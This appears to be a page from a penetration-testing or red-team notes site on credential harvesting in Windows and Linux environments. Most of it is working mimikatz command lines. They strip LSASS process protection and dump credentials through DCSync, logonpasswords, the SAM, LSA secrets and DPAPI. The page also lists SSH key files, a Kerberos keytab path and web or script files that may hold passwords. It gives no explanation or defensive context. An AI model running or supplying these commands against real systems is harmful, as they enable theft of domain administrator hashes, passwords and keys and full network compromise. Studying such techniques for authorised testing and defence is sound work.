search

Credentials

hashtag
From File

C:\program files\xxx\mail.ps1

C:\inetpub\wwwroot\loginform.aspx

hashtag
Dcsync

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exit

hashtag
logonpasswords

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

hashtag
SAM

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::sam"exit

hashtag
Secret

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::secrets"exit

hashtag
DPAPI

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::dpapi"exit

hashtag
SSH Key

  • id_rsa: Could be other user's.

  • authorized_keys

  • known_hosts

hashtag
Ansible

hashtag
Jfrog

hashtag
ccache

hashtag
keytab

/etc/krb5.keytab

PreviousAMSI, CLM, & App LockerNextLateral Movement

Last updated